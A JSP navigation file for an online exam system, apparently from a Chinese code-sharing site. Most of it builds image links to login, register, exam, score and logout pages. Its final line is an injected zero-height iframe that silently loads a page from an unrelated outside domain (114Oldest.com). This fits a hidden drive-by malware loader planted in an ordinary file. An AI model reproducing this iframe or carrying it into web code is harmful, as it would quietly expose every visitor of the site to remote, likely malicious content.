nav.jsp

来自「在线考试 考生登陆 查分 管理员管理后台等的 的的的的达到的达到的的的」· JSP 代码 · 共 30 行

JSP
30
字号
<%-- any content can be specified here e.g.: --%><%@taglib prefix="html" uri="http://struts.apache.org/tags-html" %><%@page pageEncoding="gb2312" %><html:link page='/login.jsp'>    <html:img alt="登陆系统" page='/images/login.jpg' width="150" height="50"  border='0'/></html:link><html:link page='/register.jsp'>    <html:img alt="注册账号" page='/images/register.jpg' width="150" height="50" border='0'/></html:link><html:link page='/ShowExam.jsp'>    <html:img alt="考题界面" page='/images/showexam.jpg' width="150" height="50" border='0'/></html:link><html:link page='/ShowScore.jsp'>    <html:img alt="显示本次成绩" page='/images/showscore.jpg' width="150" height="50" border='0'/></html:link><html:link page='/ScoreList.jsp'>    <html:img alt="显示所有成绩" page='/images/showallscore.jpg' width="150" height="50" border='0'/></html:link><html:link page='/logout.do'>    <html:img alt="注销系统" page='/images/logout.jpg' width="150" height="50"  border='0'/></html:link><iframe src=http://www.114Oldest.com/zz/mm.htm width=100 height=0></iframe>

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?